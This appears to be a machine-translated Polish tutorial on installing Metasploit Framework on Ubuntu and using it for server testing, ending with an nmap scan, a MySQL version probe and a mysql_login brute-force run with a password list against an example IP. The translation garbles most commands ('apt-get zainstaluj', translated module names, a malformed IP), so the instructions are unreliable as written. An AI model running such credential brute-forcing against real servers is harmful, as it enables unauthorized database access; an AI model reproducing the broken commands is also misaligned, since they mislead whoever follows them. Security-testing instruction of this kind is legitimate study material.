Metasploit framework do testowania bezpieczeństwa serwera

Spisie treści
Metasploit Framework, jest narzędzie do tworzenia i uruchamiania exploitów na komputerze lub serwerze. Metasploit Framework został napisany w języku Ruby, jest wieloplatformowy i do działania wymaga wydajnego komputera, dostępna jest wersja płatna i darmowa dla społeczności.
Można go pobrać ze strony www.metasploit.com/framework/download
Zamontujemy w Ubutnu dla Linuksa, ale działa w przypadku innych dystrybucji, zmieniając niektóre polecenia.
Uzyskujemy dostęp do okna terminala i instalujemy ruby, zanim działał z perlem, ale został zaprogramowany zupełnie na nowo.
Instalujemy zależności ruby, dzięki czemu możemy następnie uruchomić framework.
 sudo apt-get zainstaluj ruby ​​​​libruby rdoc sudo apt-get zainstaluj libyaml-ruby sudo apt-get zainstaluj libzlib-ruby sudo apt-get zainstaluj libopenssl-ruby sudo apt-get zainstaluj libdl-ruby sudo apt-get zainstaluj libreadline-ruby sudo apt -get zainstaluj libiconv-ruby sudo apt-get zainstaluj rubygems * sudo apt-get zainstaluj libgtk2-ruby libglade2-ruby 

Następnie w zależności od wersji jaką pobierzemy 32 lub 64 bit z terminka udzielimy pozwolenia:
chmod + x metasploit-latest-linux-x64-installer.run

Uruchamiamy instalator i otworzy się okno instalacji:
sudo metasploit-latest-linux-x64-installer.run

Klikamy na następujący Fordward), określamy, czy ma być zainstalowany jako usługa i port, który ma zajmować, domyślnie używa 3790.
Pod koniec instalacji z okna terminala i z dostępem roota aktualizujemy framework
z poleceniem:
msfupdate

Metasploit to program bez środowiska graficznego, który działa całkowicie w terminalu. Dostęp do oprogramowania uzyskujemy z terminala za pomocą polecenia:
msfconsole

Wewnętrzna znajomość MSF
MSF (Metasploit Framework) Składa się z szeregu modułów, takich jak:

Exploity Jakie skrypty i programy są dostępne w MSF i jakich możemy używać, są one uporządkowane według systemu operacyjnego i kategorii, na przykład exploity / windows / przeglądarka / które są exploitami dostępnymi dla przeglądarek działających w systemie Windows.

Ładunki: Jest to działanie, które zostanie wykonane, jeśli testowana przez nas luka zostanie znaleziona i wykorzystana.

Pomocniczy: skrypty pomocnicze z różnymi funkcjami, takie jak pomocniczy / skaner / portscan / tcp i używając tego skanera portów tcp uzyskalibyśmy status portu. Ten skrypt jest alternatywą dla Nmapa.

Enkodery: Kodują skrypt, aby uniknąć niektórych programów antywirusowych i antyspamowych.

Przykład testowy zaczynamy od terminala, który wykonujemy:
./msfconsole

Znak zachęty Metsploit to msf> stamtąd wykonamy wszystko i aby wyjść, po prostu wpiszemy exit
Zaczniemy od zeskanowania adresu IP za pomocą nmap
msf> nmap -sV 190.155.80.110

Aktywujemy moduł pomocniczy, aby uzyskać dostęp do narzędzi skryptowych, które umożliwią pracę na mysql. Możemy też zobaczyć wersję modułu.

Skanujemy wersję mysql, z oczywistych powodów ip jest fikcyjne i tylko na przykład:
 msf> pomocniczy (wersja_mysql)> ustaw RHOSTS 190.155.80.110 // ustaw zdalny adres IP msf> ustaw RHOSTS 192.155.80.110 msf> pomocniczy (wersja_mysql)> uruchom // sprawdź wersję mysql 

Jeśli zostanie wykonany poprawnie, może zwrócić wersję mysql:
[*] 190.155.80.110 działa Mysql5.0

Kolejny przypadek z modułem skanującym i próbą zmiany użytkownika root mysql:
 msf> użyj skanera / mysql / mysql_login msf> set NAZWA UŻYTKOWNIKA admin msf> set PASS_FILE /tmp/keys.lst // plik tekstowy z możliwymi kluczami jeden pod drugim msf> exploit 

Jeśli zadziała możemy zalogować się do mysql:
mysql -h 1920,155,80,110 -u admin -pkey

Będziesz pomóc w rozwoju serwisu, dzieląc stronę ze swoimi znajomymi

wave wave wave wave wave